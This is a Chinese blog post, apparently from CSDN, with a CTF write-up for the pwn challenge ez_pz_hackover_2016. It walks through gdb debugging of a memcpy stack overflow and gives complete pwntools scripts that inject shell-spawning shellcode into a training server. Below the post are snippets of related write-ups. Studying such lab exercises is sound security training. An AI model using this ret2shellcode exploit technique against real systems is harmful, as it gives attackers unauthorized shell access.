ez_pz_hackover_2016

最新推荐文章于 2023-05-26 11:28:26 发布
最新推荐文章于 2023-05-26 11:28:26 发布
阅读量229 收藏 1
点赞数
分类专栏: pwn 文章标签: gdb debug python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xieyichensss/article/details/116303040
版权

昨天和前天学校举办运动会,没咋学习,就做了两道题。我发现做到现在越来越难了,连wp都要看好久,我要独立思考,不能抄了。

这道题第一步要动态分析ebp与输入时在栈上的位置,不能看ida,这道题的ida好像不太准。
第二步,看没有后门函数和可以利用的systemcall,而且什么保护都没有开,就用shellcode在栈上执行这个破解方法呗。

1.溢出点在vuln函数中的memcpy函数,将源地址src拷贝n个字节的数据到dest中,那么就是向dest中输入8+14个字节才能到ebp下面一个,所以要覆盖到ret,需要26字节数据。

运行该脚本,然后在gdb的终端中输入c,再去查看ebp得值,发现是ddee。

# -*- coding: UTF-8 -*-
from pwn import *
context(log_level = 'debug',os='linux',arch='i386')
p = process('./ez_pz_hackover_2016')
gdb.attach(p)#先要在sendline之前打开gdb调试,若是在sendline之后无法调试
p.recvuntil('crash: ')
p.recvuntil("> ")
payload = 'crashme\x00' #为了过memcpy,过了memcpy才有机会执行vuln函数
payload+='aaaabbbbccccddddeeeeffffgggghhhhiiiijjjjkkkkllllmmmmnnnnooooppppqqqqrrrrsssstttt'
p.sendline(payload)
pause()
stack = int(p.recv(10),16)
payload ='crashme\x00'+'a'*18+p32(0)+asm(shellcraft.sh())
p.sendline(payload)
p.interactive()

~

2.第二点就是泄露shellcode在栈上的偏移,因为程序一开始已经打印出了栈上的一个地址,我们计算shellcode与该地址的偏移即可。

# -*- coding: UTF-8 -*-
from pwn import *
context(log_level = 'debug',os='linux',arch='i386')
p = process('./ez_pz_hackover_2016')
gdb.attach(p)#先要在sendline之前打开gdb调试,若是在sendline之后无法调试
p.recvuntil('crash: ')

stack = int(p.recv(10),16)
payload ='crashme\x00'+'a'*18+p32(0)+asm(shellcraft.sh())
p.recvuntil("> ")
p.sendline(payload)  #一开始我在这里被卡住了,因为我用的时p.sendline(p)
pause()
p.interactive()
~                                                                                                                                                            
~

然后看到了栈中有传入的shellcode,地址为0xfff5d440,而一开始打印出来的地址为0xfff5d45c,两者相减为0x1c,那么ret为p32(stack-0x1c)
这里每次泄露的地址不一样,因为开了地址随机化,但是偏移地址一定是相同的为0x1c

exp:

#-*- coding=UTF-8 -*-
from pwn import *
context(os='linux',arch='i386',log_level = 'debug')
#sh = process('./ez_pz_hackover_2016')
sh = remote('node3.buuoj.cn',26119)

elf = ELF('./ez_pz_hackover_2016')
shellcode = asm(shellcraft.sh())
#gdb.attach(sh)

sh.recvuntil('Yippie, lets crash: ')
stack_addr = int(sh.recv(10),16)#接收s栈地址

payload = 'crashme\x00'.ljust(26,"\x00") #加crashme\x00共26个字节,其余用\x00补
payload += p32(stack_addr-0x1c) + shellcode
#shellcode的地址是&s-0x1c
sh.recvuntil('>')
sh.sendline(payload)
#pause()
sh.sendline('cat flag')
sh.interactive()

有一个要注意的地方,我动态调试时将payload命名为p,文件名也命名为p,这样会在报错,比如p.sendline§

eeeeeeeeeeeeeeeea
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
BUUCTF pwn ez_pz_hackover_2016
菜的只能随便写写博客
02-21 2339
0x01 文件分析  没有不可执行栈和段上的读写保护,可以做到很多事情。   0x02 运行  输入name并且回显,上面还有一个地址。   0x03 IDA  主要的漏洞点在这个函数内部的,chall栈的大小很大,足够写入shellcode,之后的vuln函数会将s的数据复制到vuln的栈上面,但是复制的数据量远远大于栈的长度,会造成栈溢出。  并且此函数的栈的地址直接打印出来,不用再去...
BUUCTF ez_pz_hackover_2016[动态调试之初入门]
weixin_45441024的博客
01-26 508
BUUCTF ez_pz_hackover_2016[动态调试之初入门] 之前做题基本上都是放到IDA里面进行分析,所以在动态调试这方面一直有所欠缺,今天这道题就弥补了这个不足,真正地走进了栈题的动态调试 先check一下,发现什么保护都没有开,还是一个32位的程序,心里不免有些小激动,难道这题简单? 不管简单与否,我们都先运行一下,发现在输入之前回显给我们一个栈地址,并且这个地址不是固定的,所以这里一定会用到,拿小本本记下来,之后程序会将我们输入的东西打印出来 之后我们进到IDA来分析一下这个程序
[BUUCTF]PWN——ez_pz_hackover_2016
mcmuyanga的博客
10-08 2036
ez_pz_hackover_2016 题目附件 解题步骤: 例行检查,32位,开启了RELRO保护,二进制的保护机制看这里 由于没有开启nx保护,对于这题一开始想到的是利用写入shellcode来获取shell 试运行一下程序,看到程序一开始给我们了一个地址,随后让我们输入 32位ida载入,首先习惯性的shift+f12检索程序里的字符串,没有看到敏感的函数 从main函数开始看程序 程序主体在chall函数里 一开始给我们输出了参数s的地址,之后利用fgets函数读入1023(0x3ff)长度
BUUCTF-ez_pz_hackover_2016
Rt1Text的博客
11-28 405
challC 库函数 - strcmp()C 库函数 int strcmp(const char *str1, const char *str2) 把 str1 所指向的字符串和 str2 所指向的字符串进行比较。strcmp只能比较字符串,比较数组和字符串常量,不能比较数字等其他形式的参数。两个字符串自左向右逐个字符相比(按ASCII值大小相比较),直到出现不同的字符或遇'\0'为止strcmp的返回值可控,传入空字符串即可strlen同样遇0截断。
BUUCTF【ez_pz_hackover_2016
weixin_51055545的博客
02-14 1256
BUUCTF【ez_pz_hackover_2016】 例行检查 开了relro,其他保护机制都没开,扔到IDA中分析 漏洞分析 chall()函数中,有fgets(),但长度不够覆盖到返回地址,没法溢出,接着会获取s的长度,然后字符串检索,在这里我给出memchr()的定义:*C 库函数 void *memchr(const void str, int c, size_t n) 在参数 str 所指向的字符串的前 n 个字节中搜索第一次出现字符 c(一个无符号字符)的位置。 然后程序会有一个if检查,
ctf【ez_pz_hackover_2016
HUANGliang_的博客
10-29 174
ez_pz_hackover_2016
buuctf ez_pz_hackover_2016
最新发布
qq_73625550的博客
05-26 479
使用gdb调试来计算偏移,ret2shecllcode,栈溢出
Buuctf(pwn) ez_pz_hackover_2016 泄露栈地址,retshellcode;调试计算
半岛铁盒的博客
08-13 882
32位,开启了RELRO保护,堆栈地址随机化 没有开启nx保护,可利用写入shellcode来获取shell 一开始给我们输出了参数s的地址 strcmp函数: 两个字符串自左向右逐个字符相比(按ASCII值大小相比较),直到出现不同的字符或遇’\0’为止 也就是我们应该输入 ‘crashme\x00’ 可以绕过这个if检查,之后执行vuln函数 dest大小根本不是0x32,要动态调试看大小其实是 0x16 利用思路: 1.往s参数里写入shellcode,执行vuln函数后让dest造成溢出
ez_pz_hackover_2016的wp
wuyvle的博客
02-15 166
一开始给我们输出了参数s的地址,之后利用fgets函数读入1023(0x3ff)长度的数据给s,s的大小是0x40c,没法造成溢出,之后将我们输入的数据利用strcmp函数跟crashme比较,如果不是这个字符串,就退出, strcmp函数在百度百科里的解释: 两个字符串自左向右逐个字符相比(按ASCII值大小相比较),直到出现不同的字符或遇’\0’为止 也就是我们应该输入 ‘crashme\x00’ 可以绕过这个if检查,之后执行vuln函数 memcpy指的是C和C++使用的内存拷贝函数,函数原型为.
ez_setup.py
05-26
"ez_setup.py" 是一个在Python环境中用于安装setuptools的脚本文件。setuptools是Python的一个重要库,它提供了一套全面的工具集,用于管理、构建、打包和部署Python项目。这个脚本通常用于在没有其他包管理器(如...
ez_setup.py下载
05-16
ez_setup.py下载
ez_setup安装源码
01-09
安装ez_setup需要的py文件,支持win系统32位
详细ciscn_2019_s_3题解
xieyichensss的博客
04-23 1360
来了来了,我拖了好久,因为吧,之前做了个堆题,大概用了一周才做完,做完堆题,下一个题是栈的,我以为会很简单,但是对我来说很难诶。上才艺… (系统调用其他师傅都有写,我就不赘述啦啦啦啦啦),因为师傅们翻到我这里肯定对系统调用有了解了呀,我这么菜,只能在最下边呜呜呜。 1.拖入ida,反汇编(64位),注意到函数传参与32位会不同。 在函数框内发现vuln(大家应该对这种函数很熟悉了吧),还有gadgets函数,奇怪,正常的栈不会有这种东西啊,于是我就点进去看了看,看到了这两个像rax进行传参的汇编,这就为我们
绝对详细的babyheap_0ctf_2017题解
xieyichensss的博客
04-24 1005
这是我第一次做堆题,其他师傅的wp都看了一个周左右,才把大概所有我不明白的地方搞懂。 直接上其他师傅的exp,然后逐步分析叭。(希望我尽快可以自己做堆) from pwn_debug import * pdbg = pwn_debug(‘babyheap_0ctf_2017’) pdbg.remote(‘node3.buuoj.cn’,26076) p = pdbg.run(‘remote’) def allocate(size): p.recvuntil('Command: ') p.sendline(‘
buu的pwn1_sctf_2016
xieyichensss的博客
03-18 712
**(学生党太菜了)** pwn_sctf_2016 1.拿到文件,首先checksec并file一下。 发现NX打开了,哦 糟糕.不过不慌,我们下一步打开IDA看一哈 2.用32位的IDA打开他,反汇编一下。双击vuln()函数。 得到这一大堆我看不懂的东西,不过我看到最后有strcpy函数,知道是一个栈溢出的问题。s的大小为0h3c,且函数中出现I和you,着重分析他俩(经过一系列的百度)。得到最后是用you代替I,这样输入20个I就可以溢出到ebp了。 3.我又在全部函数中找啊找,发现...
ciscn_2019_es_2
xieyichensss的博客
05-05 622
这一题主要是利用栈迁移,这对我来说是新知识,所以花了比较长的时间来复现和看其他师傅的wp。 思路: 1.read0x30个字节,而s大小只有0x28,留给我们的操作空间不大呀,那我们把前边题目要写入垃圾数据的空间不填入垃圾数据,填入需要的payload,然后在ebp位置上填要返回的位置(就是填垃圾数据的地方),最后在ret位置上填leave_ret的地址(这里要注意,vul函数退出时有一个leave_ret,但是我们又构造了一个leave_ret)明天出动态调试过程,今天不想动脑嘿嘿 ...
ciscn_2019_n_8
xieyichensss的博客
04-07 493
最近做题好少啊,感觉堆好难啊。 废话不多说了,这是我做过的挺简单的一个题了。 1.拿到文件,直接file,发现保护基本全开,心里一凉,然后拖入ida。 2.发现是个很简单的栈溢出,如果var数组的第14个参数为0x11,即可调用system(’/bin/sh’)。 而又有scanf函数,且第一个参数为var数组的首地址。 3.exp from pwn import * context.os=‘linux’ context.arch=‘i386’ context.log_level=‘debug’ #sla=
BUU ciscn_2019_n_1
xieyichensss的博客
03-19 388
**BUUOJ ciscn_2019_n_1** (今天来晚了,嘿嘿,出去唱歌了,被淋成落汤鸡) 1.老规矩,将其checksec和file一下,发现NX保护被打开了,且是64为的ELF文件。 2.那就放入IDA64内分析,按fn+F5查看c的代码,发现一个func()的函数,双击进入 cat flag直接映入眼帘,我tm直接暗喜,有后门函数了诶,那就不慌了,直接看c的代码。 3.要想将后门函数覆盖到返回地址,那就必须要v2=11.28125,可是又没有v2的gets函数,我们...
ez_udp_connect
05-24
`ez_udp_connect` 是一个函数,一般用于创建一个 UDP(User Datagram Protocol)连接。UDP 是一种无连接的协议,它不提供像 TCP(Transmission Control Protocol)那样的可靠性,但在某些情况下,它的速度和效率比 TCP 更高。 这个函数通常会传入目标 IP 地址和端口号,然后返回一个文件描述符或套接字,用于后续的数据传输。在使用 `ez_udp_connect` 前,需要先创建一个 UDP 套接字,使用 `socket` 函数即可。函数声明如下: ```c int ez_udp_connect(int sockfd, const struct sockaddr *addr, socklen_t addrlen); ``` 其中,`sockfd` 表示创建好的 UDP 套接字的文件描述符或套接字,`addr` 和 `addrlen` 表示要连接的目标地址和端口号。函数返回值为 0 表示成功,否则表示失败。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值